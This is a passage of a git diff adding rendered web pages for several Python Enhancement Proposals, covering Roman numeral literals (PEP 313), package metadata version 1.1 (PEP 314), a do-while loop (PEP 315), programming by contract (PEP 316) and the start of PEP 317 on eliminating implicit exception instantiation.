Roman numerals are used in a number of areas, and adding them to +Python as literals would make computations in those areas easier. +For instance, Super Bowls are counted with Roman numerals, and many +older movies have copyright dates in Roman numerals. Further, +LISP provides a Roman numerals literal package, so adding Roman +numerals to Python will help ease the LISP-envy sometimes seen in +comp.lang.python. Besides, the author thinks this is the easiest +way to get his name on a PEP.

+
+
+

Syntax for Roman literals

+

Roman numeral literals will consist of the characters M, D, C, L, +X, V and I, and only those characters. They must be in upper +case, and represent an integer with the following rules:

+
    +
  1. Except as noted below, they must appear in the order M, D, C, +L, X, V then I. Each occurrence of each character adds 1000, 500, +100, 50, 10, 5 and 1 to the value of the literal, respectively.
  2. +
  3. Only one D, V or L may appear in any given literal.
  4. +
  5. At most three each of Is, Xs and Cs may appear consecutively +in any given literal.
  6. +
  7. A single I may appear immediately to the left of the single V, +followed by no Is, and adds 4 to the value of the literal.
  8. +
  9. A single I may likewise appear before the last X, followed by +no Is or Vs, and adds 9 to the value.
  10. +
  11. X is to L and C as I is to V and X, except the values are 40 +and 90, respectively.
  12. +
  13. C is to D and M as I is to V and X, except the values are 400 +and 900, respectively.
  14. +
+

Any literal composed entirely of M, D, C, L, X, V and I characters +that does not follow this format will raise a syntax error, +because explicit is better than implicit.

+
+
+

Built-In “roman” Function

+

The new built-in function “roman” will aid the translation from +integers to Roman numeral literals. It will accept a single +object as an argument, and return a string containing the literal +of the same value. If the argument is not an integer or a +rational (see PEP 239) it will be passed through the existing +built-in “int” to obtain the value. This may cause a loss of +information if the object was a float. If the object is a +rational, then the result will be formatted as a rational literal +(see PEP 240) with the integers in the string being Roman +numeral literals.

+
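
A minimal sketch of such a function in plain Python, assuming the +modern subtractive forms (IX, MCMXC) that the pronouncement notes +were never agreed upon:

+
_NUMERALS = [(1000, 'M'), (900, 'CM'), (500, 'D'), (400, 'CD'),
+             (100, 'C'), (90, 'XC'), (50, 'L'), (40, 'XL'),
+             (10, 'X'), (9, 'IX'), (5, 'V'), (4, 'IV'), (1, 'I')]
+
+def roman(obj):
+    n = int(obj)             # coerce via int(), as described above
+    if n <= 0:
+        raise ValueError("no Roman numeral for %r" % n)
+    out = []
+    for value, digits in _NUMERALS:
+        while n >= value:    # greedy subtractive conversion
+            out.append(digits)
+            n -= value
+    return ''.join(out)
+
+assert roman(1990) == 'MCMXC'
+assert roman(9) == 'IX'
+
+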
+
+

Compatibility Issues

+

No new keywords are introduced by this proposal. Programs that +use variable names that are all upper case and contain only the +characters M, D, C, L, X, V and I will be affected by the new +literals. These programs will now have syntax errors when those +variables are assigned, and either syntax errors or subtle bugs +when those variables are referenced in expressions. Since such +variable names violate PEP 8, the code is already broken; it +just wasn’t generating exceptions. This proposal corrects that +oversight in the language.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0313.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0314/index.html new file mode 100644 index 00000000000..f506023c45e --- /dev/null +++ b/pep-0314/index.html @@ -0,0 +1,468 @@ + + + + + + + + PEP 314 – Metadata for Python Software Packages 1.1 | peps.python.org + + +
+
+


+ + +
+
+
+

PEP 314 – Metadata for Python Software Packages 1.1

+
+
Author:
+
A.M. Kuchling, Richard Jones
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
12-Apr-2003
+
Python-Version:
+
2.5
+
Post-History:
+
29-Apr-2003
+
Replaces:
+
241
+
Superseded-By:
+
345
+
+
+
+
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Core metadata specifications, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Introduction

+

This PEP describes a mechanism for adding metadata to Python +packages. It includes specifics of the field names, and their +semantics and usage.

+

This document specifies version 1.1 of the metadata format. +Version 1.0 is specified in PEP 241.

+
+
+

Including Metadata in Packages

+

The Distutils sdist command will extract the metadata fields +from the arguments and write them to a file in the generated +zipfile or tarball. This file will be named PKG-INFO and will be +placed in the top directory of the source distribution (where the +README, INSTALL, and other files usually go).

+

Developers may not provide their own PKG-INFO file. The sdist +command will, if it detects an existing PKG-INFO file, terminate +with an appropriate error message. This should prevent confusion +caused by the PKG-INFO and setup.py files being out of sync.

+

The PKG-INFO file format is a single set of RFC 822 headers +parseable by the rfc822.py module. The field names listed in the +following section are used as the header names.

+
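
For instance, the headers can be read back with the rfc822 module +named above (a hypothetical snippet; the file path is illustrative):

+
import rfc822
+
+fp = open('PKG-INFO')
+msg = rfc822.Message(fp)
+print msg.getheader('Metadata-Version')
+print msg.getheader('Name')
+print msg.getheaders('Classifier')   # a multiple-use field
+fp.close()
+
+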
+
+

Fields

+

This section specifies the names and semantics of each of the +supported metadata fields.

+

Fields marked with “(Multiple use)” may be specified multiple +times in a single PKG-INFO file. Other fields may only occur +once in a PKG-INFO file. Fields marked with “(optional)” are +not required to appear in a valid PKG-INFO file; all other +fields must be present.

+
+

Metadata-Version

+

Version of the file format; currently “1.0” and “1.1” are the +only legal values here.

+

Example:

+
Metadata-Version: 1.1
+
+
+
+
+

Name

+

The name of the package.

+

Example:

+
Name: BeagleVote
+
+
+
+
+

Version

+

A string containing the package’s version number. This +field should be parseable by one of the Version classes +(StrictVersion or LooseVersion) in the distutils.version +module.

+

Example:

+
Version: 1.0a2
+
+
+
+
+

Platform (multiple use)

+

A comma-separated list of platform specifications, summarizing +the operating systems supported by the package which are not +listed in the “Operating System” Trove classifiers. See +“Classifier” below.

+

Example:

+
Platform: ObscureUnix, RareDOS
+
+
+
+
+

Supported-Platform (multiple use)

+

Binary distributions containing a PKG-INFO file will use the +Supported-Platform field in their metadata to specify the OS and +CPU for which the binary package was compiled. The semantics of +the Supported-Platform field are not specified in this PEP.

+

Example:

+
Supported-Platform: RedHat 7.2
+Supported-Platform: i386-win32-2791
+
+
+
+
+

Summary

+

A one-line summary of what the package does.

+

Example:

+
Summary: A module for collecting votes from beagles.
+
+
+
+
+

Description (optional)

+

A longer description of the package that can run to several +paragraphs. Software that deals with metadata should not assume +any maximum size for this field, though people shouldn’t include +their instruction manual as the description.

+

The contents of this field can be written using reStructuredText +markup [1]. For programs that work with the metadata, +supporting markup is optional; programs can also display the +contents of the field as-is. This means that authors should be +conservative in the markup they use.

+

Example:

+
Description: This module collects votes from beagles
+             in order to determine their electoral wishes.
+             Do *not* try to use this module with basset hounds;
+             it makes them grumpy.
+
+
+
+
+

Keywords (optional)

+

A list of additional keywords to be used to assist searching +for the package in a larger catalog.

+

Example:

+
Keywords: dog puppy voting election
+
+
+
+
+

Home-page (optional)

+

A string containing the URL for the package’s home page.

+

Example:

+
Home-page: http://www.example.com/~cschultz/bvote/
+
+
+
+
+

Download-URL

+

A string containing the URL from which this version of the package +can be downloaded. (This means that the URL can’t be something like +“…/package-latest.tgz”, but instead must be “…/package-0.45.tgz”.)

+
+
+

Author (optional)

+

A string containing the author’s name at a minimum; additional +contact information may be provided.

+

Example:

+
Author: C. Schultz, Universal Features Syndicate,
+        Los Angeles, CA <cschultz@peanuts.example.com>
+
+
+
+
+

Author-email

+

A string containing the author’s e-mail address. It can contain +a name and e-mail address in the legal forms for a RFC 822 +‘From:’ header. It’s not optional because cataloging systems +can use the e-mail portion of this field as a unique key +representing the author. A catalog might provide authors the +ability to store their GPG key, personal home page, and other +additional metadata about the author, and optionally the +ability to associate several e-mail addresses with the same +person. Author-related metadata fields are not covered by this +PEP.

+

Example:

+
Author-email: "C. Schultz" <cschultz@example.com>
+
+
+
+
+

License

+

Text indicating the license covering the package where the license +is not a selection from the “License” Trove classifiers. See +“Classifier” below.

+

Example:

+
License: This software may only be obtained by sending the
+         author a postcard, and then the user promises not
+         to redistribute it.
+
+
+
+
+

Classifier (multiple use)

+

Each entry is a string giving a single classification value +for the package. Classifiers are described in PEP 301.

+

Examples:

+
Classifier: Development Status :: 4 - Beta
+Classifier: Environment :: Console (Text Based)
+
+
+
+
+

Requires (multiple use)

+

Each entry contains a string describing some other module or +package required by this package.

+

The format of a requirement string is identical to that of a +module or package name usable with the ‘import’ statement, +optionally followed by a version declaration within parentheses.

+

A version declaration is a series of conditional operators and +version numbers, separated by commas. Conditional operators +must be one of “<”, “>”, “<=”, “>=”, “==”, and “!=”. Version +numbers must be in the format accepted by the +distutils.version.StrictVersion class: two or three +dot-separated numeric components, with an optional “pre-release” +tag on the end consisting of the letter ‘a’ or ‘b’ followed by a +number. Example version numbers are “1.0”, “2.3a2”, and “1.3.99”.

+

Any number of conditional operators can be specified, e.g. +the string “>1.0, !=1.3.4, <2.0” is a legal version declaration.

+
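
A hypothetical helper, not part of the PEP, that splits such a +requirement string into its module name and version conditions:

+
import re
+
+_REQ = re.compile(r'^\s*([\w.]+)\s*(?:\(([^)]*)\))?\s*$')
+
+def parse_requirement(req):
+    m = _REQ.match(req)
+    if m is None:
+        raise ValueError('bad requirement: %r' % (req,))
+    name, conds = m.group(1), m.group(2)
+    if conds:
+        return name, [c.strip() for c in conds.split(',')]
+    return name, []
+
+assert parse_requirement('zlib (>=1.1.4)') == ('zlib', ['>=1.1.4'])
+assert parse_requirement('rfc822') == ('rfc822', [])
+
+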

All of the following are possible requirement strings: “rfc822”, +“zlib (>=1.1.4)”, “zope”.

+

There’s no canonical list of what strings should be used; the +Python community is left to choose its own standards.

+

Example:

+
Requires: re
+Requires: sys
+Requires: zlib
+Requires: xml.parsers.expat (>1.0)
+Requires: psycopg
+
+
+
+
+

Provides (multiple use)

+

Each entry contains a string describing a package or module that +will be provided by this package once it is installed. These +strings should match the ones used in Requirements fields. A +version declaration may be supplied (without a comparison +operator); the package’s version number will be implied if none +is specified.

+

Example:

+
Provides: xml
+Provides: xml.utils
+Provides: xml.utils.iso8601
+Provides: xml.dom
+Provides: xmltools (1.3)
+
+
+
+
+

Obsoletes (multiple use)

+

Each entry contains a string describing a package or module +that this package renders obsolete, meaning that the two packages +should not be installed at the same time. Version declarations +can be supplied.

+

The most common use of this field will be in case a package name +changes, e.g. Gorgon 2.3 gets subsumed into Torqued Python 1.0. +When you install Torqued Python, the Gorgon package should be +removed.

+

Example:

+
Obsoletes: Gorgon
+
+
+
+
+
+

Summary of Differences From PEP 241

+
    +
  • Metadata-Version is now 1.1.
  • +
• Added the Classifier field from PEP 301.
  • +
• The License and Platform fields should now only be used if the +platform or license can’t be handled by an appropriate Classifier +value.
  • +
  • Added fields: Download-URL, Requires, Provides, Obsoletes.
  • +
+
+
+

Open issues

+

None.

+
+
+

Acknowledgements

+

None.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0314.rst

+

Last modified: 2024-10-06 16:27:00 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0315/index.html new file mode 100644 index 00000000000..0cc4d42e033 --- /dev/null +++ b/pep-0315/index.html @@ -0,0 +1,279 @@ + + + + + + + + PEP 315 – Enhanced While Loop | peps.python.org + + +
+
+


+ + +
+
+
+

PEP 315 – Enhanced While Loop

+
+
Author:
+
Raymond Hettinger <python at rcn.com>, W Isaac Carroll <icarroll at pobox.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
25-Apr-2003
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP proposes adding an optional “do” clause to the beginning +of the while loop to make loop code clearer and reduce errors +caused by code duplication.

+
+
+

Notice

+

Rejected; see [1].

+

This PEP has been deferred since 2006; see [2].

+

Subsequent efforts to revive the PEP in April 2009 did not +meet with success because no syntax emerged that could +compete with the following form:

+
while True:
+    <setup code>
+    if not <condition>:
+        break
+    <loop body>
+
+
+

A syntax alternative to the one proposed in the PEP was found for +a basic do-while loop but it gained little support because the +condition was at the top:

+
do ... while <cond>:
+    <loop body>
+
+
+

Users of the language are advised to use the while-True form with +an inner if-break when a do-while loop would have been appropriate.

+
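
A concrete instance of that recommended form, with the setup step +run at least once and the test in the middle (the input data is +illustrative):

+
chunks = iter(['ab', 'cde', ''])   # '' plays the role of end-of-input
+
+total = 0
+while True:
+    chunk = next(chunks)     # <setup code>
+    if not chunk:            # not <condition>
+        break
+    total += len(chunk)      # <loop body>
+
+assert total == 5
+
+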
+
+

Motivation

+

It is often necessary for some code to be executed before each +evaluation of the while loop condition. This code is often +duplicated outside the loop, as setup code that executes once +before entering the loop:

+
<setup code>
+while <condition>:
+    <loop body>
+    <setup code>
+
+
+

The problem is that duplicated code can be a source of errors if +one instance is changed but the other is not. Also, the purpose +of the second instance of the setup code is not clear because it +comes at the end of the loop.

+

It is possible to prevent code duplication by moving the loop +condition into a helper function, or an if statement in the loop +body. However, separating the loop condition from the while +keyword makes the behavior of the loop less clear:

+
def helper(args):
+    <setup code>
+    return <condition>
+
+while helper(args):
+    <loop body>
+
+
+

This last form has the additional drawback of requiring the loop’s +else clause to be added to the body of the if statement, further +obscuring the loop’s behavior:

+
while True:
+    <setup code>
+    if not <condition>: break
+    <loop body>
+
+
+

This PEP proposes to solve these problems by adding an optional +clause to the while loop, which allows the setup code to be +expressed in a natural way:

+
do:
+    <setup code>
+while <condition>:
+    <loop body>
+
+
+

This keeps the loop condition with the while keyword where it +belongs, and does not require code to be duplicated.

+
+
+

Syntax

+

The syntax of the while statement

+
while_stmt : "while" expression ":" suite
+         ["else" ":" suite]
+
+
+

is extended as follows:

+
while_stmt : ["do" ":" suite]
+            "while" expression ":" suite
+            ["else" ":" suite]
+
+
+
+
+

Semantics of break and continue

+

In the do-while loop the break statement will behave the same as +in the standard while loop: It will immediately terminate the loop +without evaluating the loop condition or executing the else +clause.

+

A continue statement in the do-while loop jumps to the while +condition check.

+

In general, when the while suite is empty (a pass statement), +the do-while loop and break and continue statements should match +the semantics of do-while in other languages.

+

Likewise, when the do suite is empty, the do-while loop and +break and continue statements should match behavior found +in regular while loops.

+
+
+

Future Statement

+

Because of the new keyword “do”, the statement

+
from __future__ import do_while
+
+
+

will initially be required to use the do-while form.

+
+
+

Implementation

+

The first implementation of this PEP can compile the do-while loop +as an infinite loop with a test that exits the loop.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0315.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0316/index.html new file mode 100644 index 00000000000..0f19657a8aa --- /dev/null +++ b/pep-0316/index.html @@ -0,0 +1,528 @@ + + + + + + + + PEP 316 – Programming by Contract for Python | peps.python.org + + +
+
+


+ + +
+
+
+

PEP 316 – Programming by Contract for Python

+
+
Author:
+
Terence Way <terry at wayforward.net>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
02-May-2003
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This submission describes programming by contract for Python. +Eiffel’s Design By Contract(tm) is perhaps the most popular use of +programming contracts [2].

+

Programming contracts extend the language to include invariant +expressions for classes and modules, and pre- and post-condition +expressions for functions and methods.

+

These expressions (contracts) are similar to assertions: they must be +true or the program is stopped, and run-time checking of the contracts +is typically only enabled while debugging. Contracts are higher-level +than straight assertions and are typically included in documentation.

+
+
+

Motivation

+

Python already has assertions, why add extra stuff to the language to +support something like contracts? The two best reasons are 1) better, +more accurate documentation, and 2) easier testing.

+

Complex modules and classes never seem to be documented quite right. +The documentation provided may be enough to convince a programmer to +use a particular module or class over another, but the programmer +almost always has to read the source code when the real debugging +starts.

+

Contracts extend the excellent example provided by the doctest +module [4]. Documentation is readable by programmers, yet has +executable tests embedded in it.

+

Testing code with contracts is easier too. Comprehensive contracts +are equivalent to unit tests [8]. Tests exercise the full range of +pre-conditions, and fail if the post-conditions are triggered. +Theoretically, a correctly specified function can be tested completely +randomly.

+

So why add this to the language? Why not have several different +implementations, or let programmers implement their own assertions? +The answer is the behavior of contracts under inheritance.

+

Suppose Alice and Bob use different assertions packages. If Alice +produces a class library protected by assertions, Bob cannot derive +classes from Alice’s library and expect proper checking of +post-conditions and invariants. If they both use the same assertions +package, then Bob can override Alice’s methods yet still test against +Alice’s contract assertions. The natural place to find this +assertions system is in the language’s run-time library.

+
+
+

Specification

+

The docstring of any module or class can include invariant contracts +marked off with a line that starts with the keyword inv followed +by a colon (:). Whitespace at the start of the line and around the +colon is ignored. The colon is either immediately followed by a +single expression on the same line, or by a series of expressions on +following lines indented past the inv keyword. The normal Python +rules about implicit and explicit line continuations are followed +here. Any number of invariant contracts can be in a docstring.

+

Some examples:

+
# state enumeration
+START, CONNECTING, CONNECTED, CLOSING, CLOSED = range(5)
+
+class conn:
+
+    """A network connection
+
+    inv: self.state in [START, CLOSED,       # closed states
+                        CONNECTING, CLOSING, # transition states
+                        CONNECTED]
+
+    inv: 0 <= self.seqno < 256
+    """
+
+class circbuf:
+
+    """A circular buffer.
+
+    inv:
+        # there can be from 0 to max items on the buffer
+        0 <= self.len <= len(self.buf)
+
+        # g is a valid index into buf
+        0 <= self.g < len(self.buf)
+
+        # p is also a valid index into buf
+        0 <= self.p < len(self.buf)
+
+        # there are len items between get and put
+        (self.p - self.g) % len(self.buf) == \
+              self.len % len(self.buf)
+    """
+
+
+

Module invariants must be true after the module is loaded, and at the +entry and exit of every public function within the module.

+

Class invariants must be true after the __init__ function returns, +at the entry of the __del__ function, and at the entry and exit of +every other public method of the class. Class invariants must use the +self variable to access instance variables.

+

A method or function is public if its name doesn’t start with an +underscore (_), unless it starts and ends with ‘__’ (two underscores).

+

The docstring of any function or method can have pre-conditions +documented with the keyword pre following the same rules above. +Post-conditions are documented with the keyword post optionally +followed by a list of variables. The variables are in the same scope +as the body of the function or method. This list declares the +variables that the function/method is allowed to modify.

+

An example:

+
class circbuf:
+
+    def __init__(self, leng):
+        """Construct an empty circular buffer.
+
+        pre: leng > 0
+        post[self]:
+            self.is_empty()
+            len(self.buf) == leng
+        """
+
+
+

A double-colon (::) can be used instead of a single colon (:) to +support docstrings written using reStructuredText [7]. For +example, the following two docstrings describe the same contract:

+
"""pre: leng > 0"""
+"""pre:: leng > 0"""
+
+
+

Expressions in pre- and post-conditions are defined in the module +namespace – they have access to nearly all the variables that the +function can access, except closure variables.

+

The contract expressions in post-conditions have access to two +additional variables: __old__ which is filled with shallow copies +of values declared in the variable list immediately following the post +keyword, and __return__ which is bound to the return value of the +function or method.

+

An example:

+
class circbuf:
+
+    def get(self):
+        """Pull an entry from a non-empty circular buffer.
+
+        pre: not self.is_empty()
+        post[self.g, self.len]:
+            __return__ == self.buf[__old__.self.g]
+            self.len == __old__.self.len - 1
+        """
+
+
+

All contract expressions have access to some additional convenience +functions. To make evaluating the truth of sequences easier, two +functions forall and exists are defined as:

+
def forall(a, fn = bool):
+    """Return True only if all elements in a are true.
+
+    >>> forall([])
+    1
+    >>> even = lambda x: x % 2 == 0
+    >>> forall([2, 4, 6, 8], even)
+    1
+    >>> forall('this is a test'.split(), lambda x: len(x) == 4)
+    0
+    """
+
+def exists(a, fn = bool):
+    """Returns True if there is at least one true value in a.
+
+    >>> exists([])
+    0
+    >>> exists('this is a test'.split(), lambda x: len(x) == 4)
+    1
+    """
+
+
+

An example:

+
def sort(a):
+    """Sort a list.
+
+    pre: isinstance(a, list)
+    post[a]:
+        # array size is unchanged
+        len(a) == len(__old__.a)
+
+        # array is ordered
+        forall([a[i] >= a[i-1] for i in range(1, len(a))])
+
+        # all the old elements are still in the array
+        forall(__old__.a, lambda e: __old__.a.count(e) == a.count(e))
+    """
+
+
+

To make evaluating conditions easier, the function implies is +defined. With two arguments, this is similar to the logical implies +(=>) operator. With three arguments, this is similar to C’s +conditional expression (x?a:b). This is defined as:

+
implies(False, a) => True
+implies(True, a) => a
+implies(False, a, b) => b
+implies(True, a, b) => a
+
+
+
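
One way to realise that table as an ordinary function (an +illustration; the PEP specifies only the behaviour):

+
def implies(test, a, b=True):
+    if test:
+        return a
+    return b
+
+assert implies(False, 'x') is True
+assert implies(True, 'x') == 'x'
+assert implies(False, 'x', 'y') == 'y'
+assert implies(True, 'x', 'y') == 'x'
+
+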

On entry to a function, the function’s pre-conditions are checked. An +assertion error is raised if any pre-condition is false. If the +function is public, then the class or module’s invariants are also +checked. Copies of variables declared in the post are saved, the +function is called, and if the function exits without raising an +exception, the post-conditions are checked.

+
+

Exceptions

+

Class/module invariants are checked even if a function or method exits +by signalling an exception (post-conditions are not).

+

All failed contracts raise exceptions which are subclasses of the +ContractViolationError exception, which is in turn a subclass of the +AssertionError exception. Failed pre-conditions raise a +PreconditionViolationError exception. Failed post-conditions raise +a PostconditionViolationError exception, and failed invariants raise +a InvariantViolationError exception.

+

The class hierarchy:

+
AssertionError
+    ContractViolationError
+        PreconditionViolationError
+        PostconditionViolationError
+        InvariantViolationError
+        InvalidPreconditionError
+
+
+

The InvalidPreconditionError is raised when pre-conditions are +illegally strengthened, see the next section on Inheritance.

+

Example:

+
try:
+    some_func()
+except contract.PreconditionViolationError:
+    # failed pre-condition, ok
+    pass
+
+
+
+
+

Inheritance

+

A class’s invariants include all the invariants for all super-classes +(class invariants are ANDed with super-class invariants). These +invariants are checked in method-resolution order.

+

A method’s post-conditions also include all overridden post-conditions +(method post-conditions are ANDed with all overridden method +post-conditions).

+

An overridden method’s pre-conditions can be ignored if the overriding +method’s pre-conditions are met. However, if the overriding method’s +pre-conditions fail, all of the overridden method’s pre-conditions +must also fail. If not, a separate exception is raised, the +InvalidPreconditionError. This supports weakening pre-conditions.

+

A somewhat contrived example:

+
class SimpleMailClient:
+
+    def send(self, msg, dest):
+        """Sends a message to a destination:
+
+        pre: self.is_open() # we must have an open connection
+        """
+
+    def recv(self):
+        """Gets the next unread mail message.
+
+        Returns None if no message is available.
+
+        pre: self.is_open() # we must have an open connection
+        post: __return__ is None or isinstance(__return__, Message)
+        """
+
+class ComplexMailClient(SimpleMailClient):
+    def send(self, msg, dest):
+        """Sends a message to a destination.
+
+        The message is sent immediately if currently connected.
+        Otherwise, the message is queued locally until a
+        connection is made.
+
+        pre: True # weakens the pre-condition from SimpleMailClient
+        """
+
+    def recv(self):
+        """Gets the next unread mail message.
+
+        Waits until a message is available.
+
+        pre: True # can always be called
+        post: isinstance(__return__, Message)
+        """
+
+
+

Because pre-conditions can only be weakened, a ComplexMailClient can +replace a SimpleMailClient with no fear of breaking existing code.

+
+
+
+

Rationale

+

Except for the following differences, programming-by-contract for +Python mirrors the Eiffel DBC specification [3].

+

Embedding contracts in docstrings is patterned after the doctest +module. It removes the need for extra syntax, ensures that programs +with contracts are backwards-compatible, and no further work is +necessary to have the contracts included in the docs.

+

The keywords pre, post, and inv were chosen instead of the +Eiffel-style REQUIRE, ENSURE, and INVARIANT because +they’re shorter, more in line with mathematical notation, and for a +more subtle reason: the word ‘require’ implies caller +responsibilities, while ‘ensure’ implies provider guarantees. Yet +pre-conditions can fail through no fault of the caller when using +multiple inheritance, and post-conditions can fail through no fault of +the function when using multiple threads.

+

Loop invariants as used in Eiffel are unsupported. They’re a pain to +implement, and not part of the documentation anyway.

+

The variable names __old__ and __return__ were picked to avoid +conflicts with the return keyword and to stay consistent with +Python naming conventions: they’re public and provided by the Python +implementation.

+

Having variable declarations after a post keyword describes exactly +what the function or method is allowed to modify. This removes the +need for the NoChange syntax in Eiffel, and makes the +implementation of __old__ much easier. It also is more in line +with Z schemas [9], which are divided into two parts: declaring what +changes followed by limiting the changes.

+

Shallow copies of variables for the __old__ value prevent an +implementation of contract programming from slowing down a system too +much. If a function changes values that wouldn’t be caught by a +shallow copy, it can declare the changes like so:

+
post[self, self.obj, self.obj.p]
+
+
+
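A sketch of that snapshot step, with an invented save_old helper; the real implementation resolves the dotted names listed after post against the function's namespace:

import copy

def save_old(names, namespace):
    # Shallow-copy each declared name; the results become __old__.
    # eval() stands in for proper dotted-name resolution in this sketch.
    return dict((name, copy.copy(eval(name, {}, namespace)))
                for name in names)

# e.g. save_old(['a'], {'a': [3, 1, 2]}) copies the list itself, but any
# mutable objects *inside* it are still shared -- hence the ability to
# declare deeper paths such as self.obj.p explicitly.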

The forall, exists, and implies functions were added after +spending some time documenting existing functions with contracts. +These capture a majority of common specification idioms. It might +seem that defining implies as a function might not work (the +arguments are evaluated whether needed or not, in contrast with other +boolean operators), but it works for contracts since there should be +no side-effects for any expression in a contract.

+
+
+

Reference Implementation

+

A reference implementation is available [1]. It replaces existing +functions with new functions that do contract checking, by directly +changing the class’ or module’s namespace.
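In outline, that strategy amounts to little more than the following sketch (enable_contracts is an invented entry point; wrap would be a contract-checking wrapper such as the one sketched earlier):

import types

def enable_contracts(module, wrap):
    # Rebind every plain function in the module's namespace to a
    # checking wrapper around the original.
    for name, obj in list(vars(module).items()):
        if isinstance(obj, types.FunctionType):
            setattr(module, name, wrap(obj))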

+

Other implementations exist that either hack __getattr__ [5] +or use __metaclass__ [6].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0316.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0317/index.html b/pep-0317/index.html new file mode 100644 index 00000000000..d455b898611 --- /dev/null +++ b/pep-0317/index.html @@ -0,0 +1,569 @@ + PEP 317 – Eliminate Implicit Exception Instantiation | peps.python.org
+
+


+ + +
+
+
+

PEP 317 – Eliminate Implicit Exception Instantiation

+
+
Author:
+
Steven Taschuk <staschuk at telusplanet.net>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
06-May-2003
+
Python-Version:
+
2.4
+
Post-History:
+
09-Jun-2003
+
+
+
+
+
+

Abstract

+
+
“For clarity in new code, the form raise class(argument, ...) +is recommended (i.e. make an explicit call to the constructor).”

—Guido van Rossum, in 1997 [1]

+
+

This PEP proposes the formal deprecation and eventual elimination of +forms of the raise statement which implicitly instantiate an +exception. For example, statements such as

+
raise HullBreachError
+raise KitchenError, 'all out of baked beans'
+
+
+

must under this proposal be replaced with their synonyms

+
raise HullBreachError()
+raise KitchenError('all out of baked beans')
+
+
+

Note that these latter statements are already legal, and that this PEP +does not change their meaning.

+

Eliminating these forms of raise makes it impossible to use string +exceptions; accordingly, this PEP also proposes the formal deprecation +and eventual elimination of string exceptions.

+

Adoption of this proposal breaks backwards compatibility. Under the +proposed implementation schedule, Python 2.4 will introduce warnings +about uses of raise which will eventually become incorrect, and +Python 3.0 will eliminate them entirely. (It is assumed that this +transition period – 2.4 to 3.0 – will be at least one year long, to +comply with the guidelines of PEP 5.)

+
+
+

Motivation

+
+

String Exceptions

+

It is assumed that removing string exceptions will be uncontroversial, +since it has been intended since at least Python 1.5, when the +standard exception types were changed to classes [1].

+

For the record: string exceptions should be removed because the +presence of two kinds of exception complicates the language without +any compensation. Instance exceptions are superior because, for +example,

+
    +
  • the class-instance relationship more naturally expresses the relationship between the exception type and value,
  • they can be organized naturally using superclass-subclass relationships, and
  • they can encapsulate error-reporting behaviour (for example).
+
+
+

Implicit Instantiation

+

Guido’s 1997 essay [1] on changing the standard exceptions into +classes makes clear why raise can instantiate implicitly:

+
+
“The raise statement has been extended to allow raising a class +exception without explicit instantiation. The following forms, +called the “compatibility forms” of the raise statement […] The +motivation for introducing the compatibility forms was to allow +backward compatibility with old code that raised a standard +exception.”
+

For example, it was desired that pre-1.5 code which used string +exception syntax such as

+
raise TypeError, 'not an int'
+
+
+

would work both on versions of Python in which TypeError was a +string, and on versions in which it was a class.

+

When no such consideration obtains – that is, when the desired +exception type is not a string in any version of the software which +the code must support – there is no good reason to instantiate +implicitly, and it is clearer not to. For example:

+
    +
  1. In the code
    try:
    +    raise MyError, raised
    +except MyError, caught:
    +    pass
    +
    +
    +

    the syntactic parallel between the raise and except +statements strongly suggests that raised and caught refer +to the same object. For string exceptions this actually is the +case, but for instance exceptions it is not.

    +
  2. When instantiation is implicit, it is not obvious when it occurs, for example, whether it occurs when the exception is raised or when it is caught. Since it actually happens at the raise, the code should say so.

    (Note that at the level of the C API, an exception can be “raised” +and “caught” without being instantiated; this is used as an +optimization by, for example, PyIter_Next. But in Python, no +such optimization is or should be available.)

    +
  3. An implicitly instantiating raise statement with no arguments, such as
    raise MyError
    +
    +
    +

    simply does not do what it says: it does not raise the named +object.

    +
  4. The equivalence of
    raise MyError
    +raise MyError()
    +
    +
    +

    conflates classes and instances, creating a possible source of +confusion for beginners. (Moreover, it is not clear that the +interpreter could distinguish between a new-style class and an +instance of such a class, so implicit instantiation may be an +obstacle to any future plan to let exceptions be new-style +objects.)

    +
+

In short, implicit instantiation has no advantages other than +backwards compatibility, and so should be phased out along with what +it exists to ensure compatibility with, namely, string exceptions.

+
+
+
+

Specification

+

The syntax of raise_stmt [3] is to be changed from

+
raise_stmt ::= "raise" [expression ["," expression ["," expression]]]
+
+
+

to

+
raise_stmt ::= "raise" [expression ["," expression]]
+
+
+

If no expressions are present, the raise statement behaves as it +does presently: it re-raises the last exception that was active in the +current scope, and if no exception has been active in the current +scope, a TypeError is raised indicating that this is the problem.

+

Otherwise, the first expression is evaluated, producing the raised +object. Then the second expression is evaluated, if present, +producing the substituted traceback. If no second expression is +present, the substituted traceback is None.

+

The raised object must be an instance. The class of the instance is +the exception type, and the instance itself is the exception value. +If the raised object is not an instance – for example, if it is a +class or string – a TypeError is raised.

+

If the substituted traceback is not None, it must be a traceback +object, and it is substituted instead of the current location as the +place where the exception occurred. If it is neither a traceback +object nor None, a TypeError is raised.

+
+
+

Backwards Compatibility

+
+

Migration Plan

+
+

Future Statement

+

Under the PEP 236 future statement:

+
from __future__ import raise_with_two_args
+
+
+

the syntax and semantics of the raise statement will be as +described above. This future feature is to appear in Python 2.4; its +effect is to become standard in Python 3.0.

+

As the examples below illustrate, this future statement is only needed +for code which uses the substituted traceback argument to raise; +simple exception raising does not require it.

+
+
+

Warnings

+

